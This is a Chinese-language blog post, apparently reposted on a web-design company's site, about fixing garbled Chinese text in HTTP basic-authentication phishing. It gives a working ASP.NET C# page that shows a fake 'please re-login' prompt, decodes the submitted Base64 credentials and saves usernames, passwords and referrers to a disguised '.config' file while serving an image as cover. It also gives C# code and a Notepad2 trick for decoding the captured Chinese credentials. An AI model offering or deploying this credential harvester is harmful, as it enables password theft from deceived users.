企业资讯
- 企业新闻
- 行业文章

关于基础验证钓鱼中文乱码的解决方法

最近基础认证钓鱼很火，参考91ri.org的《基础认证钓鱼攻击与防范》一文。不过乱码始终是个问题。经测试后已实现的解决方法有两种：

方法一：手动分析Request头

如果客户端接受了WWW-AuThenticate验证，则会在下一次连接中添加请求头 Authorization，格式为：

 Authorization: Basic Og==

1	Authorization: Basic Og==

Basic代表应用基础模式验证，由服务端WWW-AuThenticate头指定的验证模式指定。由于我们需要获取密码，所以这里一定为Basic。

之后以一个空格作为分隔符，其余的内容为用户名与密码，加密方式为标准BASE64，格式为用户名:密码。

（更多资料请参考rfc文档。）

所以我们只需要判断请求头是否包含Authorization即可，如果没有的话则输出401返回头要求输入密码。

一段简单的C#代码：

 &lt;% string logpath=Server.MapPath(“//fuck.config”); string info=”please re-login”; string imgpath=Server.MapPath(“//img.jpg”); if(Request.Headers["Authorization"]==null||Request.Headers["Authorization"].StartsWith(“Basic Og==”)){ Response.Status=”401 Unauthorized”; Response.AddHeader(“WWW-AuThenticate”,string.Format(“basic ,Realm=/”{0}/”",info)); } else{ string referrer=(Request.UrlReferrer==null)?”":Request.UrlReferrer.ToString(); System.IO.File.AppendAllText(logpath,Encoding.Default.GetString(Convert.FromBase64String(Request.Headers["Authorization"].Remove(0,5).Trim()))+”|”+referrer+”/r/n”); if(System.IO.File.Exists(imgpath))Response.BinaryWrite(System.IO.File.ReadAllBytes(imgpath)); } %&gt;

string logpath=Server.MapPath(“//fuck.config”);

string info=“please re-login”;

string imgpath=Server.MapPath(“//img.jpg”);

if(Request.Headers[“Authorization”]==null||Request.Headers[“Authorization”].StartsWith(“Basic Og==”)){

Response.Status=“401 Unauthorized”;

Response.AddHeader(“WWW-AuThenticate”,string.Format(“basic ,Realm=/”{0}/”",info));

}

else{

string referrer=(Request.UrlReferrer==null)?“”:Request.UrlReferrer.ToString();

System.IO.File.AppendAllText(logpath,Encoding.Default.GetString(Convert.FromBase64String(Request.Headers[“Authorization”].Remove(0,5).Trim()))+“|”+referrer+“/r/n”);

if(System.IO.File.Exists(imgpath))Response.BinaryWrite(System.IO.File.ReadAllBytes(imgpath));

}

 二、将乱码转换回正常的字符 乱码其实是西欧字符，在拓展ASCII中为0x7f-0xff，所以只需要转换回去就行了。 不过要注意：直接转换是不可能的。在中文操作系统中0x7f-0xff单个字节被认为是无效字符，转换后只能输出0x3f(?)。同时如果想将乱码保存到文件中，则必须使用unicode等格式保存，这时乱码将变为两字节，转换更加繁琐。 经过尝试可以使用以下C#代码转换，注意：必须在winform下编译使用，webform下即使是相同的Unicode编码也会转换出不同的字节数组，从而导致无法转换。

1	二、将乱码转换回正常的字符乱码其实是西欧字符，在拓展ASCII中为0x7f-0xff，所以只需要转换回去就行了。不过要注意：直接转换是不可能的。在中文操作系统中0x7f-0xff单个字节被认为是无效字符，转换后只能输出0x3f(?)。同时如果想将乱码保存到文件中，则必须使用unicode等格式保存，这时乱码将变为两字节，转换更加繁琐。经过尝试可以使用以下C#代码转换，注意：必须在winform下编译使用，webform下即使是相同的Unicode编码也会转换出不同的字节数组，从而导致无法转换。

 using System; using System.Text; using System.Windows.Forms; using System.Collections.Generic;  public class Decript {    public static void Main()    {        string s=”Ð¡¾µÒ»¸öÈË”;        byte[] arrb = Encoding.Unicode.GetBytes(s);        List&lt;byte&gt; lb=new List&lt;byte&gt;();        foreach(byte b in arrb){if(b!=0)lb.Add(b);}        Console.WriteLine(Encoding.Default.GetString(lb.ToArray()));     } }

using System;

using System.Text;

using System.Windows.Forms;

using System.Collections.Generic;

public class Decript

{

public static void Main()

{

string s=“Ð¡¾µÒ»¸öÈË”;

byte[] arrb = Encoding.Unicode.GetBytes(s);

List<byte> lb=new List<byte>();

foreach(byte b in arrb){if(b!=0)lb.Add(b);}

Console.WriteLine(Encoding.Default.GetString(lb.ToArray()));

}

之后又找到更简便的方法：用Notepad2建立一个unicode文档，将乱码粘贴进去，之后在编码选择任意ISO开头的编码，保存后即转换完毕。

link:http://www.cunlide.com/?post=89

鸿大千秋网站建设团队敬上